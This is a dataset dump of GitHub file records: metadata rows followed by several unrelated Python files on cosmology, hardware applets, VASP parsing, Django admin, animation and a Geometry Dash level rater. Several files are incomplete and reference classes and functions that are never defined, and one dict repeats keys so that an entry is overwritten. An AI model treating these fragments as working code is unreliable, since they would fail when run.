5faed7df0481d882b8814038712e8be58ef77e17 | 3,397 | py | Python | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-09-15T10:10:26.000Z | 2021-09-15T10:10:26.000Z | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | null | null | null | cosmosis-standard-library/shear/cl_to_xi_fullsky/cl_to_xi_interface.py | ktanidis2/Modified_CosmoSIS_for_galaxy_number_count_angular_power_spectra | 07e5d308c6a8641a369a3e0b8d13c4104988cd2b | [
"BSD-2-Clause"
] | 1 | 2021-06-11T15:29:43.000Z | 2021-06-11T15:29:43.000Z | #coding: utf-8
#import cl_to_xi_full
from __future__ import print_function
from builtins import range
import numpy as np
from cosmosis.datablock import option_section, names as section_names
from cl_to_xi import save_xi_00_02, save_xi_22, arcmin_to_radians, SpectrumInterp
from legendre import get_legfactors_00, get_legfactors_02, precomp_GpGm
| 36.138298 | 87 | 0.657345 |
5fafc8dcb4215c91fc9ae3f825e9c6da430bff4a | 326 | py | Python | software/glasgow/applet/video/__init__.py | electroniceel/Glasgow | f6d8fda1d5baec006a6c43fa3d2547a33bdee666 | [
"Apache-2.0",
"0BSD"
] | 1,014 | 2019-10-05T16:21:43.000Z | 2022-03-31T09:26:43.000Z | software/glasgow/applet/video/__init__.py | attie/glasgow | eca2cb278478d9cb9a102e6e99dfc5bd2d77a549 | [
"Apache-2.0",
"0BSD"
] | 113 | 2019-10-06T07:49:37.000Z | 2022-03-24T04:33:08.000Z | software/glasgow/applet/video/__init__.py | attie/glasgow | eca2cb278478d9cb9a102e6e99dfc5bd2d77a549 | [
"Apache-2.0",
"0BSD"
] | 79 | 2019-10-08T07:36:03.000Z | 2022-03-21T07:00:27.000Z | """
The ``video`` taxon groups applets implementing video interfaces, that is, interfaces for periodic
transfers of 2d arrays of samples of electromagnetic wave properties.
Examples: VGA output, TFT LCD capture, TFT LCD output.
Counterexamples: SCSI scanner (use taxon ``photo``), SPI LCD output (use taxon ``display``).
"""
| 40.75 | 98 | 0.757669 |
5fb11bba5257814c53fdaf00b36feffb7caef7ad | 22,329 | py | Python | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | 3 | 2016-11-18T07:19:57.000Z | 2016-11-28T08:28:38.000Z | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | aiida_vasp/parsers/content_parsers/vasprun.py | DropD/aiida_vasp | 9967f5501a6fc1c67981154068135cec7be5396a | [
"MIT"
] | null | null | null | """
The vasprun.xml parser interface.
---------------------------------
Contains the parsing interfaces to ``parsevasp`` used to parse ``vasprun.xml`` content.
"""
# pylint: disable=abstract-method, too-many-public-methods
import numpy as np
from parsevasp.vasprun import Xml
from parsevasp import constants as parsevaspct
from aiida_vasp.parsers.content_parsers.base import BaseFileParser
from aiida_vasp.utils.compare_bands import get_band_properties
def _build_structure(lattice):
"""Builds a structure according to AiiDA spec."""
structure_dict = {}
structure_dict['unitcell'] = lattice['unitcell']
structure_dict['sites'] = []
# AiiDA wants the species as symbols, so invert
elements = _invert_dict(parsevaspct.elements)
for pos, specie in zip(lattice['positions'], lattice['species']):
site = {}
site['position'] = np.dot(pos, lattice['unitcell'])
site['symbol'] = elements[specie].title()
site['kind_name'] = elements[specie].title()
structure_dict['sites'].append(site)
return structure_dict
def _invert_dict(dct):
return dct.__class__(map(reversed, dct.items()))
| 31.898571 | 132 | 0.578261 |
5fb1b34629d1b25a94935e87aa37911d21e8edb9 | 704 | py | Python | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 8 | 2019-06-18T20:20:39.000Z | 2019-11-09T20:21:06.000Z | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 8 | 2019-12-04T23:26:42.000Z | 2022-02-10T12:02:19.000Z | estoque/admin.py | Felipebros/mini_curso_django | 965dd5e8837db9dea4485e889c2b8703fb5e902d | [
"MIT"
] | 3 | 2019-06-21T22:37:32.000Z | 2019-10-31T00:38:45.000Z | from django.contrib import admin
from .models import Produto, TipoProduto, Estoque
# Register your models here.
admin.site.register(TipoProduto, TipoProdutoAdmin)
admin.site.register(Estoque, EstoqueAdmin)
admin.site.register(Produto, ProdutoAdmin) | 35.2 | 105 | 0.755682 |
5fb1ba21e31a7c2b9e588c895f10ae57243ce651 | 3,137 | py | Python | star/star.py | gd-star-pp/star-pp | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | 2 | 2021-10-10T23:42:30.000Z | 2022-03-31T19:43:13.000Z | star/star.py | lotus-gd/azalea | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | null | null | null | star/star.py | lotus-gd/azalea | 24c7289199215961fe5462b99ec600907b305d3f | [
"MIT"
] | null | null | null | import gd, itertools
from cube import calculate_cube
from ball import calculate_ball
from helpers import average
client = gd.Client()
modes = {gd.PortalType.CUBE: calculate_cube,
gd.PortalType.SHIP: calculate_ship,
gd.PortalType.BALL: calculate_ball,
gd.PortalType.BALL: calculate_ufo,
gd.PortalType.UFO: calculate_ufo,
gd.PortalType.WAVE: calculate_wave,
gd.PortalType.ROBOT: calculate_robot,
gd.PortalType.SPIDER: calculate_spider,
gd.Gamemode.CUBE: calculate_cube,
gd.Gamemode.SHIP: calculate_ship,
gd.Gamemode.BALL: calculate_ball,
gd.Gamemode.BALL: calculate_ufo,
gd.Gamemode.UFO: calculate_ufo,
gd.Gamemode.WAVE: calculate_wave,
gd.Gamemode.ROBOT: calculate_robot,
gd.Gamemode.SPIDER: calculate_spider}
if __name__ == "__main__":
star = main()
print(star) | 36.057471 | 203 | 0.646159 |
5fb3ccf7fca90c61707cbd90f3475846779b54b9 | 341 | py | Python | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 30 | 2016-04-30T01:56:05.000Z | 2022-03-09T22:19:12.000Z | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 1 | 2021-05-19T19:36:45.000Z | 2021-05-19T19:36:45.000Z | clash-of-code/shortest/number_categories.py | jonasnic/codingame | f1a7fe8007b9ca63bdf30cd72f4d6ac41a5ac721 | [
"MIT"
] | 17 | 2020-01-28T13:54:06.000Z | 2022-03-26T09:49:27.000Z | from collections import defaultdict
c=defaultdict(set)
f=lambda:[int(i) for i in input().split()]
a,b=f()
s,e=f()
for i in range(s,e+1):
x=i%a==0
y=i%b==0
if x and y:
c[3].add(i)
elif x and not y:
c[1].add(i)
elif y and not x:
c[2].add(i)
else:
c[4].add(i)
o=[]
for i in range(1,5):
o.append(str(len(c[i])))
print(' '.join(o)) | 17.05 | 42 | 0.58651 |
5fb5e0196946388daa9f3a5d9e0cb39eba4f8a0c | 520 | py | Python | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | 3 | 2019-08-22T01:20:16.000Z | 2021-02-05T09:11:50.000Z | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | null | null | null | interpreter/src/parser/errors.py | Cdayz/simple_lang | dc19d6ef76bb69c87981c8b826cf8f71b0cc475b | [
"MIT"
] | 2 | 2019-08-22T01:20:18.000Z | 2021-05-27T14:40:12.000Z | """Module with useful exceptions for Parser."""
| 22.608696 | 52 | 0.696154 |
5fb78ad70383d16f179dd4a23ab825be06e844e6 | 1,919 | py | Python | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 155 | 2015-11-01T17:48:41.000Z | 2022-02-06T21:37:41.000Z | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 193 | 2015-09-29T21:40:31.000Z | 2020-04-21T15:09:13.000Z | apps/DuelingBanditsPureExploration/dashboard/Dashboard.py | erinzm/NEXT-chemistry | d6ca0a80640937b36f9cafb5ead371e7a8677734 | [
"Apache-2.0"
] | 54 | 2015-09-30T15:51:05.000Z | 2022-02-13T05:26:20.000Z | import json
import next.utils as utils
from next.apps.AppDashboard import AppDashboard
| 47.975 | 158 | 0.604482 |
5fba9266d157d784d487f4f6d96c252ab58bc927 | 221 | py | Python | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | tetov/ITA19 | 1af68a8885caf83acd98f4136d0286539ccbe63b | [
"MIT"
] | 7 | 2019-11-13T20:29:54.000Z | 2020-02-26T14:30:54.000Z | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | GeneKao/ITA19 | c4b10dc183599eed4ed60d922b6ef5922d173bdb | [
"MIT"
] | 4 | 2019-11-07T20:57:51.000Z | 2020-03-04T11:43:18.000Z | modules/module0/02_datastructures_and_geometry/datastructures_0b.py | GeneKao/ITA19 | c4b10dc183599eed4ed60d922b6ef5922d173bdb | [
"MIT"
] | 6 | 2019-10-30T13:25:54.000Z | 2020-02-14T14:06:09.000Z | import os
import compas
from compas.datastructures import Mesh
HERE = os.path.dirname(__file__)
DATA = os.path.join(HERE, 'data')
FILE = os.path.join(DATA, 'faces.obj')
mesh = Mesh.from_obj(FILE)
print(mesh.summary())
| 18.416667 | 38 | 0.737557 |
5fbebd443ba2cc788cd34ccb4de7f2967a894072 | 3,957 | py | Python | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 4 | 2020-05-20T03:55:19.000Z | 2020-12-24T06:33:40.000Z | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 1 | 2020-05-18T11:21:35.000Z | 2020-07-07T21:25:57.000Z | vis_utils/animation/group_animation_controller.py | eherr/vis_utils | b757b01f42e6da02ad62130c3b0e61e9eaa3886f | [
"MIT"
] | 1 | 2020-07-20T06:57:13.000Z | 2020-07-20T06:57:13.000Z | #!/usr/bin/env python
#
# Copyright 2019 DFKI GmbH.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the
# following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
# NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
# USE OR OTHER DEALINGS IN THE SOFTWARE.
from PySignal import Signal
from .animation_controller import AnimationController
from ..scene.components import ComponentBase
| 39.57 | 98 | 0.706849 |